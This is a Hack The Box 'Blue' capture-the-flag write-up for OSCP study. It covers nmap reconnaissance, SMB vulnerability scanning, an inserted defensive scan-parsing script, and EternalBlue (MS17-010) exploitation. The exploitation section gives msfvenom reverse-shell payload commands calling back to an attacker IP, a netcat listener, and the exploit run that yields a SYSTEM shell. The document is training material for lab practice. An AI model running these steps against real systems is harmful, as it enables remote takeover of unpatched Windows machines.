Hack The Box: Blue Write-up (#30)

This is my 30th box out of the 42 boxes I am working through for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.40
  • -sC: Run the default Nmap script set
  • -sV: Probe for service/version info
  • -O: Enable OS detection
  • -oA: Save scan results in all three output formats
  • -p-: Scan all ports from 1–65535

We get back the following result:

  • Port 139: running the netbios-ssn service
  • Port 445: running the SMB (microsoft-ds) service
  • Ports 135, 49152, 49153, 49154, 49155, 49156, 49157: running Windows RPC
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.0099s latency).
Scanned at 2020-08-29 18:17:03 +08 for 111s
Not shown: 65526 closed ports
Reason: 65526 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
...SNIP...
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26781/tcp): CLEAN (Couldn't connect)
| Check 2 (port 12383/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19006/udp): CLEAN (Failed to receive data)
| Check 4 (port 60195/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:18:49+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-29T10:18:51
|_ start_date: 2020-08-29T10:16:53
...
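As an added example (not part of the original write-up), the following Python script triages the scan output above the way a defender would: it parses the Nmap normal-format lines for open ports, OS string, SMB signing state and guest access, and lists the hardening items those facts imply. The scan excerpt embedded in it is constructed from the output shown above.

```python
import re
# Constructed excerpt of the Nmap normal output shown above (same lines, trimmed).
SCAN_OUTPUT = """\
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
| account_used: guest
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
"""

def parse_scan(text):
    # Pull open TCP ports, OS string, SMB signing state and guest access out of the scan.
    info = {"open_ports": [], "os": None, "smb1_signing": None,
            "smb2_signing": None, "guest_allowed": False}
    for raw in text.splitlines():
        line = raw.strip()
        port = re.match(r"^(\d+)/tcp\s+open\b", line)
        if port:
            info["open_ports"].append(int(port.group(1)))
            continue
        body = line.lstrip("|_ ")  # drop the NSE script-output prefix
        if body.startswith("OS:"):
            info["os"] = body[3:].strip()
        elif body.startswith("message_signing:"):     # SMB1 (smb-security-mode)
            info["smb1_signing"] = body.split(":", 1)[1].strip()
        elif body.startswith("Message signing"):      # SMB2 (smb2-security-mode)
            info["smb2_signing"] = body
        elif body.startswith("account_used:"):
            info["guest_allowed"] = body.split(":", 1)[1].strip() == "guest"
    return info

def findings(info):
    # Turn the parsed facts into the hardening items a defender would raise for this host.
    out = []
    if 445 in info["open_ports"]:
        out.append("SMB reachable on 445/tcp: restrict it at the host/network firewall")
    if info["os"] and "Windows 7" in info["os"]:
        out.append("Windows 7 SP1: verify the MS17-010 (CVE-2017-0143) update is installed and SMBv1 is disabled")
    if info["smb1_signing"] and info["smb1_signing"].startswith("disabled"):
        out.append("SMB1 message signing disabled: enable and require signing")
    if info["smb2_signing"] and "not required" in info["smb2_signing"]:
        out.append("SMB2 signing not required: require signing by policy")
    if info["guest_allowed"]:
        out.append("Guest session accepted by SMB: disable guest/null-session access")
    return out
```

Running findings(parse_scan(SCAN_OUTPUT)) on this host yields five items, each one a setting the scan itself exposed.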

For the UDP scan, I scanned only the top 20 ports with the --top-ports flag, because I had already rooted this box while the scan was still running.

nmap -sU -O --top-ports=20 -oA nmap/udp 10.10.10.40
  • -sU: UDP scan

We get back the following results, where every port is either closed or open|filtered (no response).

Nmap scan report for 10.10.10.40
Host is up, received user-set (0.011s latency).
Scanned at 2020-08-29 18:17:03 +08 for 329s
PORT STATE SERVICE REASON VERSION
53/udp closed domain port-unreach ttl 127
67/udp closed dhcps port-unreach ttl 127
68/udp closed dhcpc port-unreach ttl 127
69/udp closed tftp port-unreach ttl 127
123/udp closed ntp port-unreach ttl 127
135/udp closed msrpc port-unreach ttl 127
137/udp open|filtered netbios-ns no-response
138/udp open|filtered netbios-dgm no-response
139/udp closed netbios-ssn port-unreach ttl 127
161/udp closed snmp port-unreach ttl 127
162/udp closed snmptrap port-unreach ttl 127
445/udp closed microsoft-ds port-unreach ttl 127
500/udp open|filtered isakmp no-response
|_ike-version: ERROR: Script execution failed (use -d to debug)
514/udp closed syslog port-unreach ttl 127
520/udp closed route port-unreach ttl 127
631/udp closed ipp port-unreach ttl 127
1434/udp closed ms-sql-m port-unreach ttl 127
1900/udp closed upnp port-unreach ttl 127
4500/udp open|filtered nat-t-ike no-response
49152/udp closed unknown port-unreach ttl 127
Too many fingerprints match this host to give specific OS details
...

So it is obvious that the only way to get an initial foothold is by exploiting the SMB service.

Service Enumeration

Let’s run the Nmap SMB vuln scripts against this service.

nmap --script smb-vuln* -p139,445 -oA smb-vuln-scan.nmap 10.10.10.40

We get back the following results.

Nmap SMB vuln scan

As I expected, this box is vulnerable to CVE-2017-0143 (MS17-010). The vulnerability we’ll be exploiting is known as EternalBlue. Exploiting it will give us a SYSTEM shell, as it did for the Legacy box.

Before we proceed to the exploitation phase, let’s run one more scan to confirm the OS version with the smb-os-discovery script.

nmap --script smb-os-discovery -p139,445 -oA OS-Discobvery 10.10.10.40
...SNIP...
Nmap scan report for 10.10.10.40
Host is up (0.0086s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:21:56+01:00

It is Windows 7 Professional SP1.

Exploitation

  1. Download exploit code from GitHub.
  2. Create MSFvenom reverse shell payload.
  3. Run the exploit.

We follow the same steps as before, but with the reverse shell payload step automated. Let’s clone this GitHub repo.

git clone https://github.com/lokendrasinghrawat/AutoBlue-MS17-010.git

Run the following shell script to generate a reverse shell payload.

root@kali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh

Make sure you provide the following answers when the script asks for input, so that it generates a regular reverse shell payload and not a Meterpreter payload:

kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.10
LPORT you want x64 to listen on:
53
LPORT you want x86 to listen on:
8080
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=53
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE

Once done, the script merges the kernel shellcode and our reverse shell payload into one file per architecture (32-bit and 64-bit). We’ll use the sc_x64.bin payload for the exploit.

Now, start a Netcat listener on port 53.

nc -nlvp 53

Run the exploit for Windows 7.

root@kali:/opt/AutoBlue-MS17-010# pwd
/opt/AutoBlue-MS17-010
python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin

We get a SYSTEM reverse shell!

SYSTEM reverse shell

Grab the user.txt flag.

user.txt flag

Grab the root.txt flag.

root.txt flag

Attack Strategy Map

Strategy Map

Thank you for reading :-) Next box is Devel.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.